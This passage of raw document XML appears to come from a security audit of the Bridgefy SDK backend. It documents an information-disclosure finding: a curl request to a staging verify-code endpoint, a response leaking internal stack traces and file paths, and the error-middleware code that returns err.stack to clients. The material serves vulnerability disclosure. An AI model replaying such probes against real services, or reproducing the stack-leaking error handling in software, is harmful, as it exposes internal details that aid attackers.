          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(/app/node_modules/express/lib/router/route.js:144:13)\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9032" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MiddlewareParameters.handler </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(/app/src/api/middlewares/mid.parameters.ts:32:5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="7449" w:val="left" w:leader="none"/>
          <w:tab w:pos="8043" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/app/node_modules/inversify-express-utils/src/server.ts:206:26\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Layer.handle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5)\n</w:t>
        <w:tab/>
        <w:t>at next</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(/app/node_modules/express/lib/router/route.js:144:13)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(APP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Leak):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -i -s -k -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Content-Type: application/json; charset=UTF-8' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"code":"292970","phone":"+12064512559","platform":"android","versionApp":"appV1","ver sionOs":"osV1","versionSdk":"sdkV1"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'https://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>staging.app.bridgefy.services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/app/v1/user/verify-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>code'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(APP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Leak):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"response"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{},</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"message"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"The verification code is invalid."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"details"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"403 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="2402" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IBndCommonUserCud_verifySmsCode:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IBndCommonUserCud_verifySmsCode:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>verification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>code is invalid.\n</w:t>
        <w:tab/>
        <w:t>at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ImplBndCommonUserCudMongo.verifySmsCode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="6657" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(/app/src/data/mongodb/v1/impl.bnd.user-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CUD.ts:584:15)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="7845" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>processTicksAndRejections </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(node:internal/process/task_queues:95:5)\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="731" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CommonUseCaseUser.execVerifySmsCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(/app/src/core/v1/usecases/uc.user.ts:208:5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\n at async CommonUserController.verifySmsCode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(/app/src/api/modules/common/user/ctrl.common-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>user.ts:197:5)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="219"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cause</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-backend/src/api/middlewares/mid.error.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(err instanceof CommonError) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>errDetails = `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>${err.code} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>${err.stack}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>`;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>response = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
